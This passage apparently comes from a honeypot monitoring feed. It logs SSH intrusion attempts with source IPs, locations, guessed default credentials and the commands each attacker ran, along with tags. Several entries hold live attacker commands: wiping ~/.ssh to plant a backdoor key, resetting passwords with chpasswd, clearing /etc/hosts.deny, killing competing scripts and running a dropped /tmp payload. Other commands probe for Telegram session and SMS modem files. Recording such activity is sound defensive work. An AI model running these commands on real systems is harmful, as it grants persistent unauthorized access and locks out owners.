↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 burger_root_11 (162.241.127.152) — Atlanta, United States · 1 session · 20 cmds

2026-03-17 12:15 EDT · as mysql/mysql@123

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "mysql@123\npDyQdeg0sm37\npDyQdeg0sm37"|passwd|bash

$ Enter new UNIX password:

$ echo "mysql@123\npDyQdeg0sm37\npDyQdeg0sm37\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 spice_root_4 (139.59.76.43) — Bengaluru, India · 2 sessions · 8 cmds

2026-03-17 10:11 EDT · as root/qwerty, root/root

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 monsoon_root_7 (134.209.147.164) — Bengaluru, India · 1 session · 4 cmds

2026-03-17 10:04 EDT · as root/root

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 shadow_pi_3 (186.72.123.54) — Panama City, Panama · 2 sessions · 3 cmds

2026-03-17 08:11 EDT · as pi/raspberry

make executable → execute payload → execute from /tmp

$ cd /tmp && chmod +x pGwyafhw && bash -c ./pGwyafhw

↳ make executable

$ ./pGwyafhw

↳ execute payload

$ scp -t /tmp/pGwyafhw

↳ execute from /tmp

🎭 fog_root_12 (178.62.127.25) — Slough, United Kingdom · 8 sessions · 32 cmds

2026-03-17 06:01 EDT · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 autobahn_root_6 (167.71.44.204) — Frankfurt am Main, Germany · 4 sessions · 4 cmds

2026-03-17 05:00 EDT · as admin/admin, oracle/P@ssw0rd, root/1234

Ran uname 4x across 4 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×4

🎭 nasi_root_2 (47.250.208.51) — Kuala Lumpur, Malaysia · 1 session · 1 cmd

2026-03-17 04:22 EDT · as root/123456

echo

$ echo TEST

🎭 specter_root_54 (31.56.197.248) — Helsinki, Finland · 1 session · 19 cmds

2026-03-17 02:39 EDT · as root/12345678

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:dXzlmmPblLxS"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 blitz_root_5 (164.92.170.64) — Frankfurt am Main, Germany · 6 sessions · 6 cmds

2026-03-17 01:59 EDT · as admin/admin123, root/123456, root/password

Ran uname 6x across 6 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×6

🎭 fog_root_6 (206.189.114.225) — Slough, United Kingdom · 2 sessions · 2 cmds

2026-03-16 17:22 EDT · as admin/admin123, root/12345678

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×2

🎭 specter_root_55 (139.59.249.70) — Singapore, Singapore · 2 sessions · 2 cmds

2026-03-16 17:00 EDT · as guest/guest, oracle/password

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×2

🎭 silk_root_20 (115.191.70.104) — Beijing, China · 1 session · 1 cmd

2026-03-16 16:33 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 spice_sol (134.209.156.246) — Bengaluru, India · 2 sessions · 2 cmds

2026-03-16 14:59 EDT · as guest/guest, user/password

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×2

🎭 poutine_root (178.128.232.115) — Toronto, Canada · 3 sessions · 3 cmds

2026-03-16 13:18 EDT · as oracle/Bmw_20!_^, root/1234, ubuntu/password

Ran uname 3x across 3 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×3

🎭 stein_root_18 (207.154.246.50) — Frankfurt am Main, Germany · 1 session · 4 cmds

2026-03-16 13:07 EDT · as root/123456

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 burger_root_12 (205.185.125.150) — Las Vegas, United States · 1 session · 2 cmds

2026-03-16 12:20 EDT · as oracle/Oracle123!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 hockey_root_2 (143.198.42.218) — Toronto, Canada · 2 sessions · 2 cmds

2026-03-16 11:31 EDT · as oracle/oracle123, user/password

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×2

🎭 ghost_root_73 (23.97.62.145) — Singapore, Singapore · 1 session · 1 cmd

2026-03-16 11:28 EDT · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 windmill_root_6 (167.71.14.238) — Amsterdam, Netherlands · 2 sessions · 8 cmds

2026-03-16 11:23 EDT · as root/123456, root/password

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 monsoon_root_8 (64.227.144.182) — Bengaluru, India · 5 sessions · 20 cmds

2026-03-16 10:38 EDT · as admin/password, root/123456, root/12345678

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 kiwi_root_2 (170.64.151.106) — Sydney, Australia · 5 sessions · 20 cmds

2026-03-16 09:36 EDT · as oracle/oracle, postgres/postgres, root/password

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 moose_sol (146.190.247.65) — Toronto, Canada · 8 sessions · 8 cmds

2026-03-16 08:49 EDT · as admin/admin, deploy/deploy, guest/guest

Ran uname 8x across 8 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×8

🎭 chai_root_11 (64.227.181.159) — Bengaluru, India · 3 sessions · 12 cmds

2026-03-16 09:00 EDT · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 barbie_root_5 (170.64.239.137) — Sydney, Australia · 3 sessions · 12 cmds

2026-03-16 08:59 EDT · as root/123456, root/admin, root/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 beefeater_root_5 (159.65.24.165) — Slough, United Kingdom · 5 sessions · 20 cmds

2026-03-16 08:44 EDT · as root/123456, root/12345678, root/admin

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 tea_root_8 (138.68.158.168) — Slough, United Kingdom · 6 sessions · 24 cmds

2026-03-16 08:39 EDT · as root/1234, root/123456, root/12345678

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 specter_root_56 (188.166.208.212) — Singapore, Singapore · 2 sessions · 8 cmds

2026-03-16 08:17 EDT · as root/123456, root/password

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 stroopwafel_root_6 (167.172.34.53) — Amsterdam, Netherlands · 4 sessions · 16 cmds

2026-03-16 07:52 EDT · as root/123456, root/admin, root/password

export → uname → cat (repeated export 4x)

